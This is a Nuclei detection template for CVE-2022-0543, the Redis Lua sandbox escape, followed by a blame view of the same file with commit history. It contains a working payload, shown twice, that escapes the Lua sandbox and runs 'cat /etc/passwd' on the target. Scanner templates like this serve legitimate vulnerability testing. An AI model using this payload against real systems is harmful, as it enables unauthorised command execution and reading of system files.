nuclei-templates/network/cves/2022/CVE-2022-0543.yaml

id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
  remediation: Update to the most recent versions currently available.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
    - https://lists.debian.org/debian-security-announce/2022/msg00048.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
    epss-score: 0.97184
    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redis
    product: redis
    shodan-query:
      - redis_version
      - redis
  tags: cve,cve2022,network,redis,unauth,rce,kev,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6380

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022011a0e63ea5c6cc1be0d103b340fb94da0f291e22de5c2e639a40077750563ce902203e29f7cc62b489efc3598fec2d549b58bfd9bff17388c81b09e2637125c3deff:922c64590222798bb761d5b6d8e72950
Add CVE-2022-0543 (#4255) 2022-04-28 13:21:04 +00:00			`id: CVE-2022-0543`

			`info:`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`name: Redis Sandbox Escape - Remote Code Execution`
Add CVE-2022-0543 (#4255) 2022-04-28 13:21:04 +00:00			`author: dwisiswant0`
			`severity: critical`
			`description: \|`
			`This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The`
			`vulnerability was introduced by Debian and Ubuntu Redis packages that`
			`insufficiently sanitized the Lua environment. The maintainers failed to`
			`disable the package interface, allowing attackers to load arbitrary libraries.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.`
Updated network CVEs 2023-09-06 13:28:19 +00:00			`remediation: Update to the most recent versions currently available.`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`reference:`
			`- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce`
			`- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis`
			`- https://bugs.debian.org/1005787`
			`- https://www.debian.org/security/2022/dsa-5081`
network template enrichment 2023-07-16 13:29:08 +00:00			`- https://lists.debian.org/debian-security-announce/2022/msg00048.html`
Auto Generated CVE annotations [Thu Apr 28 13:21:26 UTC 2022] :robot: 2022-04-28 13:21:26 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-score: 10`
Auto Generated CVE annotations [Thu Apr 28 13:21:26 UTC 2022] :robot: 2022-04-28 13:21:26 +00:00			`cve-id: CVE-2022-0543`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`epss-score: 0.97184`
network template enrichment 2023-07-16 13:29:08 +00:00			`cpe: cpe:2.3:a:redis:redis:-:::::::*`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`metadata:`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`max-request: 2`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`vendor: redis`
network template enrichment 2023-07-16 13:29:08 +00:00			`product: redis`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- redis_version`
			`- redis`
			`tags: cve,cve2022,network,redis,unauth,rce,kev,tcp`
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`tcp:`
network template enrichment 2023-07-16 13:29:08 +00:00			`- host:`
Add CVE-2022-0543 (#4255) 2022-04-28 13:21:04 +00:00			`- "{{Hostname}}"`
Fix false negatives and typos in Redis CVE-2022-0543.yaml and exposed-redis.yaml 2023-11-13 09:36:38 +00:00			`- "tls://{{Hostname}}"`
removed duplicate network request 2023-09-16 19:35:21 +00:00			`port: 6380`

network template enrichment 2023-07-16 13:29:08 +00:00			`inputs:`
			`- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"`
Add CVE-2022-0543 (#4255) 2022-04-28 13:21:04 +00:00			`read-size: 64`
Update CVE-2022-0543.yaml 2023-11-15 17:51:25 +00:00
Add CVE-2022-0543 (#4255) 2022-04-28 13:21:04 +00:00			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 490a00463044022011a0e63ea5c6cc1be0d103b340fb94da0f291e22de5c2e639a40077750563ce902203e29f7cc62b489efc3598fec2d549b58bfd9bff17388c81b09e2637125c3deff:922c64590222798bb761d5b6d8e72950`